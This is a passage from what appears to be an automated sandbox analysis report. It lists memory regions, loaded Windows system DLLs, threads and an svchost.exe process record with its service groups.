start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7026 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7027 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7028 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7029 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7030 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7031 start_va = 0x8357340000 end_va = 0x835743ffff entry_point = 0x0 region_type = private name = "private_0x0000008357340000" filename = "" Region: id = 7032 start_va = 0x7ff6ec6c8000 end_va = 0x7ff6ec6c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6c8000" filename = "" Region: id = 7033 start_va = 0x7ffc4a100000 end_va = 0x7ffc4a17ffff entry_point = 0x7ffc4a100000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 7034 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 7035 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 7036 start_va = 0x8356e00000 end_va = 0x8356e04fff entry_point = 0x8356e00000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 7037 start_va = 0x8356e10000 end_va = 0x8356e1ffff entry_point = 0x8356e10000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 7038 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 7039 start_va = 0x7ffc50980000 end_va = 0x7ffc509e7fff entry_point = 0x7ffc50980000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 7040 start_va = 0x8356e20000 end_va = 0x8356e22fff entry_point = 0x8356e20000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 7041 start_va = 0x7ffc53980000 end_va = 0x7ffc539f3fff entry_point = 0x7ffc53980000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 7042 start_va = 0x8357440000 end_va = 0x835753ffff entry_point = 0x0 region_type = private name = "private_0x0000008357440000" filename = "" Region: id = 7043 start_va = 0x8357540000 end_va = 0x8357541fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000008357540000" filename = "" Region: id = 7044 start_va = 0x7ff6ec6c6000 end_va = 0x7ff6ec6c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6c6000" filename = "" Region: id = 7045 start_va = 0x7ffc42390000 end_va = 0x7ffc423a3fff entry_point = 0x7ffc42390000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 7046 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 7047 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 7048 start_va = 0x7ffc42440000 end_va = 0x7ffc4245efff entry_point = 0x7ffc42440000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 7059 start_va = 0x8357550000 end_va = 0x8357559fff entry_point = 0x8357550000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 7060 start_va = 0x8357560000 end_va = 0x835765ffff entry_point = 0x0 region_type = private name = "private_0x0000008357560000" filename = "" Region: id = 7061 start_va = 0x8357660000 end_va = 0x835775ffff entry_point = 0x0 region_type = private name = "private_0x0000008357660000" filename = "" Region: id = 7062 start_va = 0x8357760000 end_va = 0x835785ffff entry_point = 0x0 region_type = private name = "private_0x0000008357760000" filename = "" Region: id = 7063 start_va = 0x8357860000 end_va = 0x8357c5ffff entry_point = 0x0 region_type = private name = "private_0x0000008357860000" filename = "" Region: id = 7064 start_va = 0x7ff6ec6c2000 end_va = 0x7ff6ec6c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6c2000" filename = "" Region: id = 7065 start_va = 0x7ff6ec6c4000 end_va = 0x7ff6ec6c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6ec6c4000" filename = "" Region: id = 7066 start_va = 0x7ffc4b6e0000 end_va = 0x7ffc4b6ebfff entry_point = 0x7ffc4b6e0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 7067 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 7068 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7069 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7096 start_va = 0x7ffc52bd0000 end_va = 0x7ffc52bf4fff entry_point = 0x7ffc52bd0000 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 7097 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Thread: id = 138 os_tid = 0xe9c Thread: id = 139 os_tid = 0xe98 Thread: id = 140 os_tid = 0xe90 Thread: id = 145 os_tid = 0xe10 Thread: id = 146 os_tid = 0xe0c Thread: id = 169 os_tid = 0x5b8 Thread: id = 170 os_tid = 0x2c8 Thread: id = 171 os_tid = 0xeec Thread: id = 172 os_tid = 0xecc Thread: id = 174 os_tid = 0xefc Thread: id = 175 os_tid = 0xef4 Thread: id = 176 os_tid = 0xee8 Thread: id = 192 os_tid = 0xa38 Process: id = "12" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d28e000" os_pid = "0x398" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0xea0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e719" [0xc000000f], "LOCAL" [0x7] Region: id = 6870 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6871 start_va = 0x4052d70000 end_va = 0x4052d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052d70000" filename = "" Region: id = 6872 start_va = 0x4052d80000 end_va = 0x4052d80fff entry_point = 0x4052d80000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 6873 start_va = 0x4052d90000 end_va = 0x4052da3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052d90000" filename = "" Region: id = 6874 start_va = 0x4052db0000 end_va = 0x4052e2ffff entry_point = 0x0 region_type = private name = "private_0x0000004052db0000" filename = "" Region: id = 6875 start_va = 0x4052e30000 end_va = 0x4052e33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e30000" filename = "" Region: id = 6876 start_va = 0x4052e40000 end_va = 0x4052e40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e40000" filename = "" Region: id = 6877 start_va = 0x4052e50000 end_va = 0x4052e51fff entry_point = 0x0 region_type = private name = "private_0x0000004052e50000" filename = "" Region: id = 6878 start_va = 0x4052e60000 end_va = 0x4052e60fff entry_point = 0x0 region_type = private name = "private_0x0000004052e60000" filename = "" Region: id = 6879 start_va = 0x4052e70000 end_va = 0x4052e70fff entry_point = 0x0 region_type = private name = "private_0x0000004052e70000" filename = "" Region: id = 6880 start_va = 0x4052e80000 end_va = 0x4052e80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052e80000" filename = "" Region: id = 6881 start_va = 0x4052e90000 end_va = 0x4052e94fff entry_point = 0x4052e90000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 6882 start_va = 0x4052ea0000 end_va = 0x4052ea6fff entry_point = 0x0 region_type = private name = "private_0x0000004052ea0000" filename = "" Region: id = 6883 start_va = 0x4052eb0000 end_va = 0x4052ec1fff entry_point = 0x4052eb0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 6884 start_va = 0x4052ed0000 end_va = 0x4052ed1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052ed0000" filename = "" Region: id = 6885 start_va = 0x4052ee0000 end_va = 0x4052ee1fff entry_point = 0x4052ee0000 region_type = mapped_file name = "netprofmsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\netprofmsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netprofmsvc.dll.mui") Region: id = 6886 start_va = 0x4052ef0000 end_va = 0x4052ef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004052ef0000" filename = "" Region: id = 6887 start_va = 0x4052f00000 end_va = 0x4052ffffff entry_point = 0x0 region_type = private name = "private_0x0000004052f00000" filename = "" Region: id = 6888 start_va = 0x4053000000 end_va = 0x40530bdfff entry_point = 0x4053000000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6889 start_va = 0x4053190000 end_va = 0x4053196fff entry_point = 0x0 region_type = private name = "private_0x0000004053190000" filename = "" Region: id = 6890 start_va = 0x4053200000 end_va = 0x40532fffff entry_point = 0x0 region_type = private name = "private_0x0000004053200000" filename = "" Region: id = 6891 start_va = 0x4053300000 end_va = 0x4053487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053300000" filename = "" Region: id = 6892 start_va = 0x4053490000 end_va = 0x4053610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053490000" filename = "" Region: id = 6893 start_va = 0x4053620000 end_va = 0x40536dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004053620000" filename = "" Region: id = 6894 start_va = 0x40536e0000 end_va = 0x40537dffff entry_point = 0x0 region_type = private name = "private_0x00000040536e0000" filename = "" Region: id = 6895 start_va = 0x40537e0000 end_va = 0x4053b16fff entry_point = 0x40537e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6896 start_va = 0x4053d20000 end_va = 0x4053e1ffff entry_point = 0x0 region_type = private name = "private_0x0000004053d20000" filename = "" Region: id = 6897 start_va = 0x4053e20000 end_va = 0x4053e9ffff entry_point = 0x0 region_type = private name = "private_0x0000004053e20000" filename = "" Region: id = 6898 start_va = 0x4053ea0000 end_va = 0x4053f9ffff entry_point = 0x0 region_type = private name = "private_0x0000004053ea0000" filename = "" Region: id = 6899 start_va = 0x4053fa0000 end_va = 0x405409ffff entry_point = 0x0 region_type = private name = "private_0x0000004053fa0000" filename = "" Region: id = 6900 start_va = 0x40540a0000 end_va = 0x405419ffff entry_point = 0x0 region_type = private name = "private_0x00000040540a0000" filename = "" Region: id = 6901 start_va = 0x40541a0000 end_va = 0x405519ffff entry_point = 0x40541a0000 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 6902 start_va = 0x40551a0000 end_va = 0x4055215fff entry_point = 0x40551a0000 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 6903 start_va = 0x4055220000 end_va = 0x405531ffff entry_point = 0x0 region_type = private name = "private_0x0000004055220000" filename = "" Region: id = 6904 start_va = 0x4055320000 end_va = 0x405541ffff entry_point = 0x0 region_type = private name = "private_0x0000004055320000" filename = "" Region: id = 6905 start_va = 0x4055420000 end_va = 0x405551ffff entry_point = 0x0 region_type = private name = "private_0x0000004055420000" filename = "" Region: id = 6906 start_va = 0x4055700000 end_va = 0x40557fffff entry_point = 0x0 region_type = private name = "private_0x0000004055700000" filename = "" Region: id = 6907 start_va = 0x4055e20000 end_va = 0x4055efefff entry_point = 0x4055e20000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 6908 start_va = 0x4055f00000 end_va = 0x4055ffffff entry_point = 0x0 region_type = private name = "private_0x0000004055f00000" filename = "" Region: id = 6909 start_va = 0x4056000000 end_va = 0x40560fffff entry_point = 0x0 region_type = private name = "private_0x0000004056000000" filename = "" Region: id = 6910 start_va = 0x4056100000 end_va = 0x40561fffff entry_point = 0x0 region_type = private name = "private_0x0000004056100000" filename = "" Region: id = 6911 start_va = 0x4056200000 end_va = 0x40562fffff entry_point = 0x0 region_type = private name = "private_0x0000004056200000" filename = "" Region: id = 6912 start_va = 0x4056300000 end_va = 0x40563fffff entry_point = 0x0 region_type = private name = "private_0x0000004056300000" filename = "" Region: id = 6913 start_va = 0x4056400000 end_va = 0x40564fffff entry_point = 0x0 region_type = private name = "private_0x0000004056400000" filename = "" Region: id = 6914 start_va = 0x4056600000 end_va = 0x40566fffff entry_point = 0x0 region_type = private name = "private_0x0000004056600000" filename = "" Region: id = 6915 start_va = 0x4056700000 end_va = 0x40567fffff entry_point = 0x0 region_type = private name = "private_0x0000004056700000" filename = "" Region: id = 6916 start_va = 0x4056800000 end_va = 0x40568fffff entry_point = 0x0 region_type = private name = "private_0x0000004056800000" filename = "" Region: id = 6917 start_va = 0x4056a00000 end_va = 0x4056afffff entry_point = 0x0 region_type = private name = "private_0x0000004056a00000" filename = "" Region: id = 6918 start_va = 0x4056c00000 end_va = 0x40573fffff entry_point = 0x4056c00000 region_type = mapped_file name = "~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1462094071-1423818996-289466292-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1462094071-1423818996-289466292-1000.dat") Region: id = 6919 start_va = 0x7df5ff270000 end_va = 0x7ff5ff26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff270000" filename = "" Region: id = 6920 start_va = 0x7ff6e054e000 end_va = 0x7ff6e054ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e054e000" filename = "" Region: id = 6921 start_va = 0x7ff6e0552000 end_va = 0x7ff6e0553fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0552000" filename = "" Region: id = 6922 start_va = 0x7ff6e0554000 end_va = 0x7ff6e0555fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0554000" filename = "" Region: id = 6923 start_va = 0x7ff6e0558000 end_va = 0x7ff6e0559fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0558000" filename = "" Region: id = 6924 start_va = 0x7ff6e055a000 end_va = 0x7ff6e055bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055a000" filename = "" Region: id = 6925 start_va = 0x7ff6e055c000 end_va = 0x7ff6e055dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055c000" filename = "" Region: id = 6926 start_va = 0x7ff6e055e000 end_va = 0x7ff6e055ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e055e000" filename = "" Region: id = 6927 start_va = 0x7ff6e0560000 end_va = 0x7ff6e0561fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0560000" filename = "" Region: id = 6928 start_va = 0x7ff6e0564000 end_va = 0x7ff6e0565fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0564000" filename = "" Region: id = 6929 start_va = 0x7ff6e0566000 end_va = 0x7ff6e0567fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0566000" filename = "" Region: id = 6930 start_va = 0x7ff6e0568000 end_va = 0x7ff6e0569fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0568000" filename = "" Region: id = 6931 start_va = 0x7ff6e056a000 end_va = 0x7ff6e056bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056a000" filename = "" Region: id = 6932 start_va = 0x7ff6e056c000 end_va = 0x7ff6e056dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056c000" filename = "" Region: id = 6933 start_va = 0x7ff6e056e000 end_va = 0x7ff6e056ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e056e000" filename = "" Region: id = 6934 start_va = 0x7ff6e0570000 end_va = 0x7ff6e066ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0570000" filename = "" Region: id = 6935 start_va = 0x7ff6e0670000 end_va = 0x7ff6e0692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0670000" filename = "" Region: id = 6936 start_va = 0x7ff6e0693000 end_va = 0x7ff6e0694fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0693000" filename = "" Region: id = 6937 start_va = 0x7ff6e0699000 end_va = 0x7ff6e069afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0699000" filename = "" Region: id = 6938 start_va = 0x7ff6e069d000 end_va = 0x7ff6e069efff entry_point = 0x0 region_type = private name = "private_0x00007ff6e069d000" filename = "" Region: id = 6939 start_va = 0x7ff6e069f000 end_va = 0x7ff6e069ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e069f000" filename = "" Region: id = 6940 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 6941 start_va = 0x7ffc4aee0000 end_va = 0x7ffc4aefdfff entry_point = 0x7ffc4aee0000 region_type = mapped_file name = "bluetoothapis.dll" filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll") Region: id = 6942 start_va = 0x7ffc4af00000 end_va = 0x7ffc4af0cfff entry_point = 0x7ffc4af00000 region_type = mapped_file name = "bthtelemetry.dll" filename = "\\Windows\\System32\\BthTelemetry.dll" (normalized: "c:\\windows\\system32\\bthtelemetry.dll") Region: id = 6943 start_va = 0x7ffc4af10000 end_va = 0x7ffc4af27fff entry_point = 0x7ffc4af10000 region_type = mapped_file name = "bthradiomedia.dll" filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll") Region: id = 6944 start_va = 0x7ffc4afc0000 end_va = 0x7ffc4afd3fff entry_point = 0x7ffc4afc0000 region_type = mapped_file name = "wlanradiomanager.dll" filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll") Region: id = 6945 start_va = 0x7ffc4b090000 end_va = 0x7ffc4b09dfff entry_point = 0x7ffc4b090000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 6946 start_va = 0x7ffc4b170000 end_va = 0x7ffc4b1cefff entry_point = 0x7ffc4b170000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 6947 start_va = 0x7ffc4b1d0000 end_va = 0x7ffc4b25cfff entry_point = 0x7ffc4b1d0000 region_type = mapped_file name = "netprofmsvc.dll" filename = "\\Windows\\System32\\netprofmsvc.dll" (normalized: "c:\\windows\\system32\\netprofmsvc.dll") Region: id = 6948 start_va = 0x7ffc4c270000 end_va = 0x7ffc4c279fff entry_point = 0x7ffc4c270000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 6949 start_va = 0x7ffc4c450000 end_va = 0x7ffc4c467fff entry_point = 0x7ffc4c450000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 6950 start_va = 0x7ffc4d9d0000 end_va = 0x7ffc4daa5fff entry_point = 0x7ffc4d9d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 6951 start_va = 0x7ffc4dab0000 end_va = 0x7ffc4daccfff entry_point = 0x7ffc4dab0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 6952 start_va = 0x7ffc50a50000 end_va = 0x7ffc50a69fff entry_point = 0x7ffc50a50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 6953 start_va = 0x7ffc50a70000 end_va = 0x7ffc50a85fff entry_point = 0x7ffc50a70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 6954 start_va = 0x7ffc50bf0000 end_va = 0x7ffc50bfbfff entry_point = 0x7ffc50bf0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 6955 start_va = 0x7ffc50fa0000 end_va = 0x7ffc50fc8fff entry_point = 0x7ffc50fa0000 region_type = mapped_file name = "fontprovider.dll" filename = "\\Windows\\System32\\FontProvider.dll" (normalized: "c:\\windows\\system32\\fontprovider.dll") Region: id = 6956 start_va = 0x7ffc50fd0000 end_va = 0x7ffc51173fff entry_point = 0x7ffc50fd0000 region_type = mapped_file name = "fntcache.dll" filename = "\\Windows\\System32\\FntCache.dll" (normalized: "c:\\windows\\system32\\fntcache.dll") Region: id = 6957 start_va = 0x7ffc516e0000 end_va = 0x7ffc51759fff entry_point = 0x7ffc516e0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 6958 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6959 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6960 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 6961 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 6962 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 6963 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6964 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 6965 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 6966 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 6967 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 6968 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6969 start_va = 0x7ffc543d0000 